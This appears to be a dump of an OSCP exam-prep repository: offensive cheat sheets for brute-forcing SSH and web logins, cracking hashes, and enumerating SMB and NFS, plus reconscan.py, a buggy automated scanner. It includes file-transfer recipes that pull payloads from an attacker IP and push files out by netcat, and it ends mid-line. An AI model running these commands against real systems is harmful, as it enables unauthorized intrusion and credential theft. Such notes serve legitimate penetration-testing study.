├── Crack ├── Enum-Scanning ├── .DS_Store ├── README.md ├── recon_enum │ └── reconscan.py ├── reports │ └── reports.txt └── setup.sh ├── Enumeration ├── Exploit ├── File Transfers - Linux ├── File Transfers - Windows ├── Priv Esc - Linux ├── Priv Esc - Windows ├── Readme.md ├── Reporting-Templates ├── .DS_Store ├── linux-template.md └── windows-template.md ├── SQL ├── Scripts - MS08-067 ├── Scripts - SMB ├── Scripts - Windows File Upload Using PS (without nc.exe) ├── Shells ├── Web ├── Websites ├── .DS_Store ├── Basic Linux Privilege Escalation.webloc ├── Manifesto - ScriptDotSh.webloc ├── OSCP & Cyber Stuff - Dropbox.webloc ├── Offensive Security Student Support.webloc ├── PGP Decrypt, Remove whitespace - CyberChef.webloc ├── SU-Courses:CIS643-ComputerSecutiry:References at master · Ider:SU-Courses.webloc ├── Welcome [Root Me - Hacking and Information Security learning platform].webloc └── netsecstudents- Subreddit for students studying Network Security and its related subjects.webloc ├── eBooks-Links ├── Introduction · Security - My notepad.webloc └── OWASP Testing Guide.pdf └── tmux ├── How do I scroll in tmux? - Super User.webloc ├── tmux copy paste with mouse | Awhan Patnaik.webloc ├── tmux shortcuts & cheatsheet · GitHub.webloc └── tmux.conf /Crack: -------------------------------------------------------------------------------- 1 | 2 | Cewl 3 | cewl http:/// -m 6 -w cewl.txt 4 | wc -l cewl.txt 5 | john --wordlist=cewl.txt --rules --stdout > mutated.txt 6 | wc mutated.txt 7 | medusa -h -u admin -P mutated.txt -M http -n 80 -m DIR:/directory/to/login/panel -T 30 8 | 9 | ----------------------------------- 10 | 11 | Hydra 12 | 13 | hydra -l root -P /usr/share/wordlısts/rockyou.txt ssh 14 | hydra -L userlist.txt -P /usr/share/wordlısts/rockyou.txt -s 22 ssh -V 15 | 16 | # crack web passwords 17 | http-post-form can change as user module changes 18 | Invalid: what message does the page give for wrong creds 19 | for parameters check with burp 20 | 21 | hydra -l admin -P /usr/share/seclists/Passwords/10k_most_common.txt http-post-form "/department/login.php:username=^USER^&password=^PASS^:Invalid" -t 64 22 | 23 | ----------------------------------- 24 | 25 | Medusa 26 | medusa -h -u admin -P /usr/share/wordlists/rockyou.txt -M http -m DIR:/test -T 10 27 | 28 | ----------------------------------- 29 | 30 | Hashcat 31 | 32 | # learn the hash type from hashcat.net example hashes page and pass as its m value 33 | # or you can learn with the following command 34 | hashcat -h | grep -i lm 35 | hashcat -m 1600 hashes /usr/share/wordlists/rockyou.txt 36 | 37 | ----------------------------------- 38 | 39 | LM/NTLM 40 | hashcat -h | grep -i lm 41 | hashcat -m 3000 hashes --rules --wordlist=/usr/share/wordlists/rockyou.txt 42 | 43 | https://hashkiller.co.uk/ 44 | 45 | ------------------------------------------ 46 | 47 | When you find some digits, check if it's 32 bit 48 | echo -n ....... | wc -c 49 | 50 | ------------------------------------------ 51 | John 52 | john hashes.txt --rules --wordlist=/usr/share/wordlists/rockyou.txt 53 | 54 | 55 | 56 | -------------------------------------------------------------------------------- /Enum-Scanning/.DS_Store: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/executeatwill/OSCP-Treasure-Cave/c3e706a3527d1887b4f8462932e4372bab06d418/Enum-Scanning/.DS_Store -------------------------------------------------------------------------------- /Enum-Scanning/README.md: -------------------------------------------------------------------------------- 1 | # oscp 2 | 3 | ## Reconscan.py 4 | 5 | This script is based on the script by [Mike Czumak](http://www.securitysift.com/offsec-pwb-oscp/). But it is heavily rewritten, some things have been added, other stuff has been removed. The script is written as a preparation for the OSCP exam. It was never meant to be a general script. So if you want to use it you have to make sure to fix all the hardcoded paths. The script is multithreaded and can be run against several hosts at once. 6 | 7 | The script is invoked like this: 8 | 9 | ``` 10 | python reconscan.py 192.168.1.101 192.168.1.102 192.168.1.103 11 | ``` 12 | 13 | One important thing to note is that I removed the scan for all ports. Because it would sometimes just take to long to run. So make sure you either add that scan or run it afterwards. So you don't miss any ports. 14 | 15 | Please note that the script includes dirb and nikto-scans that are very invasive. The script also includes several nmap-scripts that check for vulnerabilities. So yeah, this script would be pretty illegal and bad to run against a machine you don't have permission to attack. 16 | 17 | ## Templates 18 | 19 | I created two templates that I used as a guide for every machine I attacked. One template is for Linux machines and the other for windows. There are some differences between them. The templates became kind of my checklists. They are divided into three sections: **recon**, **privilege escalation** and **loot**. 20 | 21 | The templates are written in markdown. But I never actually rendered them, so I don't really know how they look like rendered. They are probably pretty messy. I also used them together with markdown syntax-highlightning in my editor, so it became easy to navigate the files. 22 | 23 | The templates have a few keywords in the, like **INSERTIPADDRESS**. These are hooks that are read by reconscan.py, and it insert the target machine IP-address automatically. Some other stuff are also inserted automatically, like the a basic nmap-scan. And nikto-scan. 24 | 25 | Wherever there are references to a book. This is the book: https://bobloblaw.gitbooks.io/security/content/ 26 | -------------------------------------------------------------------------------- /Enum-Scanning/recon_enum/reconscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | import subprocess 3 | import multiprocessing 4 | from multiprocessing import Process, Queue 5 | import os 6 | import time 7 | import fileinput 8 | import atexit 9 | import sys 10 | import socket 11 | import re 12 | 13 | # Todo: 14 | # Add mysql nmap-script 15 | # Change replace to sed: 16 | # sed 's|literal_pattern|replacement_string|g' 17 | 18 | start = time.time() 19 | 20 | class bcolors: 21 | HEADER = '\033[95m' 22 | OKBLUE = '\033[94m' 23 | OKGREEN = '\033[92m' 24 | WARNING = '\033[93m' 25 | FAIL = '\033[91m' 26 | ENDC = '\033[0m' 27 | BOLD = '\033[1m' 28 | UNDERLINE = '\033[4m' 29 | 30 | 31 | # Creates a function for multiprocessing. Several things at once. 32 | def multProc(targetin, scanip, port): 33 | jobs = [] 34 | p = multiprocessing.Process(target=targetin, args=(scanip,port)) 35 | jobs.append(p) 36 | p.start() 37 | return 38 | 39 | def connect_to_port(ip_address, port, service): 40 | 41 | s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 42 | s.connect((ip_address, int(port))) 43 | banner = s.recv(1024) 44 | 45 | if service == "ftp": 46 | s.send("USER anonymous\r\n") 47 | user = s.recv(1024) 48 | s.send("PASS anonymous\r\n") 49 | password = s.recv(1024) 50 | total_communication = banner + "\r\n" + user + "\r\n" + password 51 | write_to_file(ip_address, "ftp-connect", total_communication) 52 | elif service == "smtp": 53 | total_communication = banner + "\r\n" 54 | write_to_file(ip_address, "smtp-connect", total_communication) 55 | elif service == "ssh": 56 | total_communication = banner 57 | write_to_file(ip_address, "ssh-connect", total_communication) 58 | elif service == "pop3": 59 | s.send("USER root\r\n") 60 | user = s.recv(1024) 61 | s.send("PASS root\r\n") 62 | password = s.recv(1024) 63 | total_communication = banner + user + password 64 | write_to_file(ip_address, "pop3-connect", total_communication) 65 | s.close() 66 | 67 | 68 | 69 | 70 | def write_to_file(ip_address, enum_type, data): 71 | 72 | file_path_linux = '../reports/%s/mapping-linux.md' % (ip_address) 73 | file_path_windows = '../reports/%s/mapping-windows.md' % (ip_address) 74 | paths = [file_path_linux, file_path_windows] 75 | print bcolors.OKGREEN + "INFO: Writing " + enum_type + " to template files:\n " + file_path_linux + " \n" + file_path_windows + bcolors.ENDC 76 | 77 | for path in paths: 78 | if enum_type == "portscan": 79 | subprocess.check_output("replace INSERTTCPSCAN \"" + data + "\" -- " + path, shell=True) 80 | if enum_type == "dirb": 81 | subprocess.check_output("replace INSERTDIRBSCAN \"" + data + "\" -- " + path, shell=True) 82 | if enum_type == "nikto": 83 | subprocess.check_output("replace INSERTNIKTOSCAN \"" + data + "\" -- " + path, shell=True) 84 | if enum_type == "ftp-connect": 85 | subprocess.check_output("replace INSERTFTPTEST \"" + data + "\" -- " + path, shell=True) 86 | if enum_type == "smtp-connect": 87 | subprocess.check_output("replace INSERTSMTPCONNECT \"" + data + "\" -- " + path, shell=True) 88 | if enum_type == "ssh-connect": 89 | subprocess.check_output("replace INSERTSSHCONNECT \"" + data + "\" -- " + path, shell=True) 90 | if enum_type == "pop3-connect": 91 | subprocess.check_output("replace INSERTPOP3CONNECT \"" + data + "\" -- " + path, shell=True) 92 | if enum_type == "curl": 93 | subprocess.check_output("replace INSERTCURLHEADER \"" + data + "\" -- " + path, shell=True) 94 | return 95 | 96 | 97 | 98 | def dirb(ip_address, port, url_start, wordlist="/usr/share/wordlist/dirb/big.txt, /usr/share/wordlist/dirb/vulns/cgis.txt"): 99 | print bcolors.HEADER + "INFO: Starting dirb scan for " + ip_address + bcolors.ENDC 100 | DIRBSCAN = "dirb %s://%s:%s %s -o ../reports/%s/dirb-%s.txt -r" % (url_start, ip_address, port, ip_address, ip_address, wordlist) 101 | print bcolors.HEADER + DIRBSCAN + bcolors.ENDC 102 | results_dirb = subprocess.check_output(DIRBSCAN, shell=True) 103 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with dirb scan for " + ip_address + bcolors.ENDC 104 | print results_dirb 105 | write_to_file(ip_address, "dirb", results_dirb) 106 | return 107 | 108 | def nikto(ip_address, port, url_start): 109 | print bcolors.HEADER + "INFO: Starting nikto scan for " + ip_address + bcolors.ENDC 110 | NIKTOSCAN = "nikto -h %s://%s -o ../reports/%s/nikto-%s-%s.txt" % (url_start, ip_address, ip_address, url_start, ip_address) 111 | print bcolors.HEADER + NIKTOSCAN + bcolors.ENDC 112 | results_nikto = subprocess.check_output(NIKTOSCAN, shell=True) 113 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with NIKTO-scan for " + ip_address + bcolors.ENDC 114 | print results_nikto 115 | write_to_file(ip_address, "nikto", results_nikto) 116 | return 117 | 118 | 119 | def httpEnum(ip_address, port): 120 | print bcolors.HEADER + "INFO: Detected http on " + ip_address + ":" + port + bcolors.ENDC 121 | print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC 122 | 123 | dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,"http")) 124 | dirb_process.start() 125 | nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,"http")) 126 | nikto_process.start() 127 | 128 | CURLSCAN = "curl -I http://%s" % (ip_address) 129 | print bcolors.HEADER + CURLSCAN + bcolors.END 130 | curl_results = subprocess.check_output(CURLSCAN, shell=True) 131 | write_to_file(ip_address, "curl", curl_results) 132 | HTTPSCAN = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address) 133 | print bcolors.HEADER + HTTPSCAN + bcolors.ENDC 134 | 135 | http_results = subprocess.check_output(HTTPSCAN, shell=True) 136 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTP-SCAN for " + ip_address + bcolors.ENDC 137 | print http_results 138 | 139 | return 140 | 141 | def httpsEnum(ip_address, port): 142 | print bcolors.HEADER + "INFO: Detected https on " + ip_address + ":" + port + bcolors.ENDC 143 | print bcolors.HEADER + "INFO: Performing nmap web script scan for " + ip_address + ":" + port + bcolors.ENDC 144 | 145 | dirb_process = multiprocessing.Process(target=dirb, args=(ip_address,port,"https")) 146 | dirb_process.start() 147 | nikto_process = multiprocessing.Process(target=nikto, args=(ip_address,port,"https")) 148 | nikto_process.start() 149 | 150 | SSLSCAN = "sslscan %s:%s >> ../reports/%s/ssl_scan_%s" % (ip_address, port, ip_address, ip_address) 151 | print bcolors.HEADER + SSLSCAN + bcolors.ENDC 152 | ssl_results = subprocess.check_output(SSLSCAN, shell=True) 153 | print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with SSLSCAN for " + ip_address + bcolors.ENDC 154 | 155 | HTTPSCANS = "nmap -sV -Pn -p %s --script=http-vhosts,http-userdir-enum,http-apache-negotiation,http-backup-finder,http-config-backup,http-default-accounts,http-methods,http-method-tamper,http-passwd,http-robots.txt,http-devframework,http-enum,http-frontpage-login,http-git,http-iis-webdav-vuln,http-php-version,http-robots.txt,http-shellshock,http-vuln-cve2015-1635 -oN ../reports/%s/%s_http.nmap %s" % (port, ip_address, ip_address, ip_address) 156 | print bcolors.HEADER + HTTPSCANS + bcolors.ENDC 157 | https_results = subprocess.check_output(HTTPSCANS, shell=True) 158 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with HTTPS-scan for " + ip_address + bcolors.ENDC 159 | print https_results 160 | return 161 | 162 | def mssqlEnum(ip_address, port): 163 | print bcolors.HEADER + "INFO: Detected MS-SQL on " + ip_address + ":" + port + bcolors.ENDC 164 | print bcolors.HEADER + "INFO: Performing nmap mssql script scan for " + ip_address + ":" + port + bcolors.ENDC 165 | MSSQLSCAN = "nmap -sV -Pn -p %s --script=ms-sql-info,ms-sql-config,ms-sql-dump-hashes,mysql-empty-password,mysql-brute,mysql-users,mysql-variables,mysql-vuln-cve2012-2122 --script-args=mssql.instance-port=1433,mssql.username=sa,mssql.password=sa -oN ../reports/%s/mssql_%s.nmap %s" % (port, ip_address, ip_address) 166 | print bcolors.HEADER + MSSQLSCAN + bcolors.ENDC 167 | mssql_results = subprocess.check_output(MSSQLSCAN, shell=True) 168 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with MSSQL-scan for " + ip_address + bcolors.ENDC 169 | print mssql_results 170 | return 171 | 172 | 173 | def smtpEnum(ip_address, port): 174 | print bcolors.HEADER + "INFO: Detected smtp on " + ip_address + ":" + port + bcolors.ENDC 175 | connect_to_port(ip_address, port, "smtp") 176 | SMTPSCAN = "nmap -sV -Pn -p %s --script=smtp-commands,smtp-enum-users,smtp-vuln-cve2010-4344,smtp-vuln-cve2011-1720,smtp-vuln-cve2011-1764 %s -oN ../reports/%s/smtp_%s.nmap" % (port, ip_address, ip_address, ip_address) 177 | print bcolors.HEADER + SMTPSCAN + bcolors.ENDC 178 | smtp_results = subprocess.check_output(SMTPSCAN, shell=True) 179 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMTP-scan for " + ip_address + bcolors.ENDC 180 | print smtp_results 181 | # write_to_file(ip_address, "smtp", smtp_results) 182 | return 183 | 184 | def smbNmap(ip_address, port): 185 | print "INFO: Detected SMB on " + ip_address + ":" + port 186 | smbNmap = "nmap --script=smb-enum-shares,smb-ls,smb-enum-users,smb-mbenum,smb-os-discovery,smb-security-mode,smb-vuln-cve2009-3103,smb-vuln-ms06-025,smb-vuln-ms07-029,smb-vuln-ms08-067,smb-vuln-ms10-054,smb-vuln-ms10-061,smb-vuln-regsvc-dos %s -oN ../reports/%s/smb_%s.nmap" % (ip_address, ip_address, ip_address) 187 | smbNmap_results = subprocess.check_output(smbNmap, shell=True) 188 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SMB-Nmap-scan for " + ip_address + bcolors.ENDC 189 | print smbNmap_results 190 | return 191 | 192 | def smbEnum(ip_address, port): 193 | print "INFO: Detected SMB on " + ip_address + ":" + port 194 | enum4linux = "enum4linux -a %s > ../reports/%s/enum4linux_%s 2>/dev/null" % (ip_address, ip_address, ip_address) 195 | enum4linux_results = subprocess.check_output(enum4linux, shell=True) 196 | print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with ENUM4LINUX-Nmap-scan for " + ip_address + bcolors.ENDC 197 | print enum4linux_results 198 | return 199 | 200 | def ftpEnum(ip_address, port): 201 | print bcolors.HEADER + "INFO: Detected ftp on " + ip_address + ":" + port + bcolors.ENDC 202 | connect_to_port(ip_address, port, "ftp") 203 | FTPSCAN = "nmap -sV -Pn -p %s --script=ftp-anon,ftp-bounce,ftp-libopie,ftp-proftpd-backdoor,ftp-vsftpd-backdoor,ftp-vuln-cve2010-4221 -oN '../reports/%s/ftp_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) 204 | print bcolors.HEADER + FTPSCAN + bcolors.ENDC 205 | results_ftp = subprocess.check_output(FTPSCAN, shell=True) 206 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with FTP-Nmap-scan for " + ip_address + bcolors.ENDC 207 | print results_ftp 208 | return 209 | 210 | def udpScan(ip_address): 211 | print bcolors.HEADER + "INFO: Detected UDP on " + ip_address + bcolors.ENDC 212 | UDPSCAN = "nmap -Pn -A -sC -sU -T 3 --top-ports 200 -oN '../reports/%s/udp_%s.nmap' %s" % (ip_address, ip_address, ip_address) 213 | print bcolors.HEADER + UDPSCAN + bcolors.ENDC 214 | udpscan_results = subprocess.check_output(UDPSCAN, shell=True) 215 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with UDP-Nmap scan for " + ip_address + bcolors.ENDC 216 | print udpscan_results 217 | UNICORNSCAN = "unicornscan -mU -I %s > ../reports/%s/unicorn_udp_%s.txt" % (ip_address, ip_address, ip_address) 218 | unicornscan_results = subprocess.check_output(UNICORNSCAN, shell=True) 219 | print bcolors.OKGREEN + "INFO: CHECK FILE - Finished with UNICORNSCAN for " + ip_address + bcolors.ENDC 220 | 221 | def sshScan(ip_address, port): 222 | print bcolors.HEADER + "INFO: Detected SSH on " + ip_address + ":" + port + bcolors.ENDC 223 | connect_to_port(ip_address, port, "ssh") 224 | SSHSCAN = "nmap -sV -Pn -p %s --script=ssh-auth-methods,ssh-hostkey,ssh-run,sshv1 -oN '../reports/%s/ssh_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) 225 | print bcolors.HEADER + SSHSCAN + bcolors.ENDC 226 | results_ssh = subprocess.check_output(SSHSCAN, shell=True) 227 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with SSH-Nmap-scan for " + ip_address + bcolors.ENDC 228 | print results_ssh 229 | return 230 | 231 | def pop3Scan(ip_address, port): 232 | print bcolors.HEADER + "INFO: Detected POP3 on " + ip_address + ":" + port + bcolors.ENDC 233 | connect_to_port(ip_address, port, "pop3") 234 | POP3SCAN = "nmap -sV -Pn -p %s --script=pop3-brute,pop3-capabilities,pop3-ntlm-info -oN '../reports/%s/pop3_%s.nmap' %s" % (port, ip_address, ip_address, ip_address) 235 | print bcolors.HEADER + SSHSCAN + bcolors.ENDC 236 | results_pop3 = subprocess.check_output(POP3SCAN, shell=True) 237 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with POP3-Nmap-scan for " + ip_address + bcolors.ENDC 238 | print results_pop3 239 | return 240 | 241 | 242 | def nmapScan(ip_address): 243 | ip_address = ip_address.strip() 244 | print bcolors.OKGREEN + "INFO: Running general TCP/UDP nmap scans for " + ip_address + bcolors.ENDC 245 | 246 | 247 | TCPSCAN = "nmap -sV -O %s -oN '../reports/%s/%s.nmap'" % (ip_address, ip_address, ip_address) 248 | print bcolors.HEADER + TCPSCAN + bcolors.ENDC 249 | results = subprocess.check_output(TCPSCAN, shell=True) 250 | print bcolors.OKGREEN + "INFO: RESULT BELOW - Finished with BASIC Nmap-scan for " + ip_address + bcolors.ENDC 251 | print results 252 | 253 | p = multiprocessing.Process(target=udpScan, args=(scanip,)) 254 | p.start() 255 | 256 | write_to_file(ip_address, "portscan", results) 257 | lines = results.split("\n") 258 | serv_dict = {} 259 | for line in lines: 260 | ports = [] 261 | line = line.strip() 262 | if ("tcp" in line) and ("open" in line) and not ("Discovered" in line): 263 | # print line 264 | while " " in line: 265 | line = line.replace(" ", " "); 266 | linesplit= line.split(" ") 267 | service = linesplit[2] # grab the service name 268 | 269 | port = line.split(" ")[0] # grab the port/proto 270 | # print port 271 | if service in serv_dict: 272 | ports = serv_dict[service] # if the service is already in the dict, grab the port list 273 | 274 | ports.append(port) 275 | # print ports 276 | serv_dict[service] = ports # add service to the dictionary along with the associated port(2) 277 | 278 | 279 | 280 | # go through the service dictionary to call additional targeted enumeration functions 281 | for serv in serv_dict: 282 | ports = serv_dict[serv] 283 | if re.search(r"http[^s]", serv): 284 | for port in ports: 285 | port = port.split("/")[0] 286 | multProc(httpEnum, ip_address, port) 287 | elif re.search(r"https|ssl", serv): 288 | for port in ports: 289 | port = port.split("/")[0] 290 | multProc(httpsEnum, ip_address, port) 291 | elif "smtp" in serv: 292 | for port in ports: 293 | port = port.split("/")[0] 294 | multProc(smtpEnum, ip_address, port) 295 | elif "ftp" in serv: 296 | for port in ports: 297 | port = port.split("/")[0] 298 | multProc(ftpEnum, ip_address, port) 299 | elif ("microsoft-ds" in serv) or ("netbios-ssn" == serv): 300 | for port in ports: 301 | port = port.split("/")[0] 302 | multProc(smbEnum, ip_address, port) 303 | multProc(smbNmap, ip_address, port) 304 | elif "ms-sql" in serv: 305 | for port in ports: 306 | port = port.split("/")[0] 307 | multProc(mssqlEnum, ip_address, port) 308 | elif "ssh" in serv: 309 | for port in ports: 310 | port = port.split("/")[0] 311 | multProc(sshScan, ip_address, port) 312 | elif "snmp" in serv: 313 | for port in ports: 314 | port = port.split("/")[0] 315 | multProc(snmpEnum, ip_address, port) 316 | 317 | return 318 | 319 | 320 | print bcolors.HEADER 321 | print "------------------------------------------------------------" 322 | print "!!!! RECON SCAN !!!!!" 323 | print "!!!! A multi-process service scanner !!!!!" 324 | print "!!!! dirb, nikto, ftp, ssh, mssql, pop3, tcp !!!!!" 325 | print "!!!! udp, smtp, smb !!!!!" 326 | print "------------------------------------------------------------" 327 | 328 | 329 | 330 | if len(sys.argv) < 2: 331 | print "" 332 | print "Usage: python reconscan.py " 333 | print "Example: python reconscan.py 192.168.1.101 192.168.1.102" 334 | print "" 335 | print "############################################################" 336 | pass 337 | sys.exit() 338 | 339 | print bcolors.ENDC 340 | 341 | if __name__=='__main__': 342 | 343 | # Setting ip targets 344 | targets = sys.argv 345 | targets.pop(0) 346 | 347 | dirs = os.listdir("../reports/") 348 | for scanip in targets: 349 | scanip = scanip.rstrip() 350 | if not scanip in dirs: 351 | print bcolors.HEADER + "INFO: No folder was found for " + scanip + ". Setting up folder." + bcolors.ENDC 352 | subprocess.check_output("mkdir ../reports/" + scanip, shell=True) 353 | subprocess.check_output("mkdir ../reports/" + scanip + "/exploits", shell=True) 354 | subprocess.check_output("mkdir ../reports/" + scanip + "/privesc", shell=True) 355 | print bcolors.OKGREEN + "INFO: Folder created here: " + "../reports/" + scanip + bcolors.ENDC 356 | subprocess.check_output("cp ../templates/windows-template.md ../reports/" + scanip + "/mapping-windows.md", shell=True) 357 | subprocess.check_output("cp ../templates/linux-template.md ../reports/" + scanip + "/mapping-linux.md", shell=True) 358 | print bcolors.OKGREEN + "INFO: Added pentesting templates: " + "../reports/" + scanip + bcolors.ENDC 359 | subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-windows.md", shell=True) 360 | subprocess.check_output("sed -i -e 's/INSERTIPADDRESS/" + scanip + "/g' ../reports/" + scanip + "/mapping-linux.md", shell=True) 361 | 362 | 363 | 364 | p = multiprocessing.Process(target=nmapScan, args=(scanip,)) 365 | p.start() 366 | -------------------------------------------------------------------------------- /Enum-Scanning/reports/reports.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/executeatwill/OSCP-Treasure-Cave/c3e706a3527d1887b4f8462932e4372bab06d418/Enum-Scanning/reports/reports.txt -------------------------------------------------------------------------------- /Enum-Scanning/setup.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | folder=$(find /home /usr /var /tmp /opt /mnt /root -type d -name recon_enum -print -quit 2>/dev/null) 4 | echo -e '#!/bin/bash\n' > /usr/bin/reconscan 5 | echo -e "cd $folder && python reconscan.py \"\$@\" \n" >> /usr/bin/reconscan 6 | chmod +x /usr/bin/reconscan 7 | 8 | -------------------------------------------------------------------------------- /Enumeration: -------------------------------------------------------------------------------- 1 | NMAP 2 | 3 | # Alive hosts 4 | nmap -sn 10.0.0.0/24 5 | 6 | # scan the 1024 most common ports, run OS detection, run default nmap scripts 7 | nmap -A -oA nmap 8 | 9 | # Scan more deeply, scan all 65535 ports on $targetip with a full connect scan 10 | nmap -v -sT -p- 11 | 12 | # more options 13 | nmap -sV -sC -v -A -p- 14 | nmap -sT -sV -A -O -v -p 1–65535 15 | 16 | # my preference 17 | nmap -sV -sC -v -oA output 18 | nmap -p- -v 19 | 20 | 21 | ------------------------ 22 | 23 | SMB 24 | 25 | Port 139 and 445- SMB/Samba shares 26 | Samba is a service that enables the user to share files with other machines 27 | works the same as a command line FTP client, may browse files without even having credentials 28 | 29 | # Share List: 30 | smbclient --list 31 | smbclient -L 32 | 33 | # Check SMB vulnerabilities: 34 | nmap --script=smb-check-vulns.nse -p445 35 | 36 | # basic nmap scripts to enumerate shares and OS discovery 37 | nmap -p 139,445 192.168.1.1/24 --script smb-enum-shares.nse smb-os-discovery.nse 38 | 39 | # Connect using Username 40 | root@kali:~# smbclient -L -U username -p 445 41 | 42 | # Connect to Shares 43 | smbclient \\\\\\ShareName 44 | smbclient \\\\\\ShareName -U john 45 | 46 | # enumarete with smb-shares, -a “do everything” option 47 | enum4linux -a 192.168.1.120 48 | 49 | # learn the machine name and then enumerate with smbclient 50 | nmblookup -A 192.168.1.102 51 | smbclient -L -I 192.168.1.105 52 | 53 | # rpcclient - Connect with a null-session (only works for older windows servers) 54 | rpcclient -U james 10.10.10.52 55 | rpcclient -U "" 192.168.1.105 56 | (press enter if asks for a password) 57 | rpcclient $> srvinfo 58 | rpcclient $> enumdomusers 59 | rpcclient $> enumalsgroups domain 60 | rpcclient $> lookupnames administrators 61 | rpcclient> querydominfo 62 | rpcclient> enumdomusers 63 | rpcclient> queryuser john 64 | 65 | # scan for vulnerabilities with nmap 66 | nmap --script "vuln" -p139,445 67 | 68 | ------------------------ 69 | 70 | SMTP 71 | 72 | # telnet or netcat connection 73 | nc 25 74 | VRFY root 75 | # Check for commands 76 | nmap -script smtp-commands.nse 77 | 78 | ------------------------ 79 | 80 | Port 111 - RPC 81 | 82 | Rpcbind can help us look for NFS-shares. So look out for nfs. Obtain list of services running with RPC: 83 | 84 | rpcbind -p 85 | rpcinfo –p x.x.x.x 86 | 87 | # using nmap, see which port NFS is listening 88 | locate *rpc*.nse 89 | nmap --script rpcinfo.nse -p 111 90 | 91 | ------------------------- 92 | 93 | NFS 94 | 95 | # to find the public share 96 | locate *nfs*.nse 97 | nmap --script nfs-showmount.nse 98 | 99 | # mount the share to a folder under /tmp 100 | mkdir /tmp/nfs 101 | /sbin/mount.nfs :/home/box /tmp/nfs 102 | 103 | 104 | 105 | 106 | 107 | 108 | 109 | 110 | 111 | -------------------------------------------------------------------------------- /Exploit: -------------------------------------------------------------------------------- 1 | Searchsploit 2 | # To view the file 3 | searchsploit -x php/webapps/41564.c 4 | 5 | # To see the full path of the file 6 | searchsploit -p php/webapps/41564.c 7 | -------------------------------------------------------------------------------- /File Transfers - Linux: -------------------------------------------------------------------------------- 1 | Python SimpleHTTPServer 2 | 3 | #on Attacker 4 | python -m SimpleHTTPServer 5 | 6 | #on target 7 | wget :8000/filename 8 | 9 | 10 | ------------------------------ 11 | 12 | Apache 13 | 14 | #on Attacker 15 | cp filetosend.txt /var/www/html 16 | service apache2 start 17 | 18 | #on target 19 | wget http://attackerip/file 20 | curl http://attackerip/file > file 21 | fetch http://attackerip/file # on BSD 22 | 23 | ---------------------------------- 24 | 25 | Netcat (From Target to Kali) 26 | 27 | # Listen on Kali 28 | nc -lvp 4444 > file 29 | 30 | # Send from Target machine 31 | nc 4444 < file 32 | 33 | ----------------- 34 | 35 | 36 | Netcat (From Kali to Target) 37 | 38 | # on target, wait for the file 39 | nc -nvlp 55555 > file 40 | 41 | # on kali, push the file 42 | nc $victimip 55555 < file 43 | 44 | 45 | ---------------------- 46 | 47 | Extra: 48 | To send the executable file to your machine: 49 | 50 | base64 executable 51 | # copy the output 52 | # paste it in a file called file.txt 53 | # decode it and create the executable 54 | base64 -d file.txt > executable 55 | 56 | 57 | 58 | 59 | -------------------------------------------------------------------------------- /File Transfers - Windows: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------- 3 | TFTP 4 | # Windows XP and Win 2003 contain tftp client. Windows 7 do not by default 5 | # tfpt clients are usually non-interactive, so they could work through an obtained shell 6 | 7 | atftpd --daemon --port 69 /tftp 8 | Windows> tftp -i 192.168.30.45 GET nc.exe 9 | 10 | -------------------------------------- 11 | 12 | FTP (pyftpdlib client on Kali) 13 | # Ftp is generally installed on Windows machines 14 | # To make it interactive, use -s option 15 | 16 | # On Kali install a ftp client and set a username/password 17 | apt-get install python-pyftpdlib 18 | python -m pyftpdlib -p 21 19 | 20 | # on Windows 21 | ftp 22 | > binary 23 | > get exploit.exe 24 | 25 | ------------------------------------------- 26 | 27 | FTP (pureftpd client on Kali) 28 | 29 | # on Kali 30 | 31 | # install ftp client 32 | apt-get install pure-ftpd 33 | # create a group 34 | groupadd ftpgroup 35 | # add a user 36 | useradd -g ftpgroup -d /dev/null -s /etc ftpuser 37 | # Create a directory for your ftp-files (you can also specify a specific user e.g.: /root/ftphome/bob). 38 | mkdir /root/ftphome 39 | # Create a ftp-user, in our example "bob" (again you can set "-d /root/ftphome/bob/" if you wish). 40 | pure-pw useradd bob -u ftpuser -g ftpgroup -d /root/ftphome/ 41 | # Update the ftp database after adding our new user. 42 | pure-pw mkdb 43 | # change ownership of the specified ftp directory (and all it's sub-direcotries) 44 | chown -R ftpuser:ftpgroup /root/ftphome 45 | # restart Pure-FTPD 46 | /etc/init.d/pure-ftpd restart 47 | 48 | 49 | # On Windows 50 | echo open 21> ftp.txt 51 | echo USER username password >> ftp.txt 52 | echo bin >> ftp.txt 53 | echo GET evil.exe >> ftp.txt 54 | echo bye >> ftp.txt 55 | ftp -s:ftp.txt 56 | 57 | -------------------------------------- 58 | 59 | Powershell 60 | echo $storageDir = $pwd > wget.ps1 61 | echo $webclient = New-Object System.Net.WebClient >>wget.ps1 62 | echo $url = "http:///powerup.ps1" 